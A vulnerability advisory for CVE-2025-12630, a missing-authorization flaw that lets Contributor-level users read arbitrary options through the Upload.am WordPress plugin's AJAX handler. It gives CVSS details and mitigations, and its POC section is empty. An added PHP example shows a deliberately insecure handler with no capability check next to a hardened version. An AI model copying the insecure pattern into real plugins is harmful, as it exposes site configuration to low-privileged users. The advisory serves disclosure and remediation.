WordPress Upload.am – Contributor+ Arbitrary Option Disclosure (CVE-2025-12630)
Author: Beatriz Fresno Naumova (beafn28)
Date: 29/09/2025
Vendor: Upload.am
Product: Upload.am File Hosting VPN (WordPress Plugin)
Versions affected: < 1.0.1
Component: AJAX request handler – option retrieval
CWE: CWE-862 – Missing Authorization
OWASP: A5 – Broken Access Control
Attack type: Remote
Impact: Information Disclosure
Description
The Upload.am File Hosting VPN WordPress plugin versions prior to 1.0.1 contain a missing authorization vulnerability in an AJAX request handler. The affected endpoint does not perform a proper capability check, allowing authenticated users with low privileges (such as Contributor) to retrieve arbitrary WordPress site options.
This lack of authorization enforcement enables unauthorized access to sensitive configuration values that should be restricted to administrative roles.
Impact
Primary impact: Information disclosure of WordPress site options.
Consequences:
Exposure of sensitive configuration data
Facilitation of further attacks through reconnaissance
Increased risk of privilege escalation or targeted exploitation
Attack Details
Attack Vector (AV): Network (N)
Attack Complexity (AC): Low (L)
Privileges Required (PR): Low (L)
User Interaction (UI): None (N)
Scope (S): Unchanged (U)
Confidentiality (C): Low (L)
Integrity (I): None (N)
Availability (A): None (N)
CVSS v3.1 Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS v3.1 Base Score: 4.9 (Medium)
POC
Mitigation
Enforce capability checks: Validate user permissions using current_user_can() in all AJAX handlers.
Least privilege enforcement: Prevent contributor-level users from accessing site-wide configuration options.
Proper error handling: Return 403 Forbidden responses for unauthorized access attempts.
Security testing: Add regression tests to ensure authorization checks are enforced on all endpoints.
Code audit: Review similar AJAX handlers for repeated authorization flaws.
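The following is an added example, not the plugin's own code: a WordPress AJAX option handler written first in the CWE-862 shape this advisory describes, then hardened with the capability check, 403 response and allow-list from the mitigation list above. The hook name, function names and option names are assumptions.

```php
<?php
// Added example, not the Upload.am plugin's code. Hook, function and
// option names below are assumptions chosen for illustration.

// --- Vulnerable pattern (CWE-862): no capability check. Any logged-in
// user who can reach admin-ajax.php, including a Contributor, can read
// whichever option name the request supplies.
function example_get_option_insecure() {
    $name = isset( $_POST['option'] ) ? sanitize_key( wp_unslash( $_POST['option'] ) ) : '';
    wp_send_json_success( array( 'value' => get_option( $name ) ) );
}

// --- Hardened handler: nonce check, capability check, allow-listed names.
function example_get_option_secure() {
    // Rejects requests without a valid nonce (dies with 403 by default).
    check_ajax_referer( 'example_get_option', 'nonce' );

    // Site-wide configuration is an administrator concern (least privilege).
    // wp_send_json_error() sends the HTTP status and terminates the request.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // Only the options this feature actually needs may be requested, so the
    // client can no longer name arbitrary rows in wp_options.
    $allowed = array( 'example_api_endpoint', 'example_display_mode' );
    $name    = isset( $_POST['option'] ) ? sanitize_key( wp_unslash( $_POST['option'] ) ) : '';
    if ( ! in_array( $name, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown option' ), 400 );
    }

    wp_send_json_success( array( 'value' => get_option( $name ) ) );
}

// Registered for authenticated users only; the wp_ajax_nopriv_ hook is
// deliberately not added, and the insecure function is never registered.
add_action( 'wp_ajax_example_get_option', 'example_get_option_secure' );
```

For the regression-test item above, a WP_Ajax_UnitTestCase that authenticates as a Contributor, calls the action and asserts on the error response covers the authorization path.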
Discoverer
Beatriz Fresno Naumova (beafn28)
References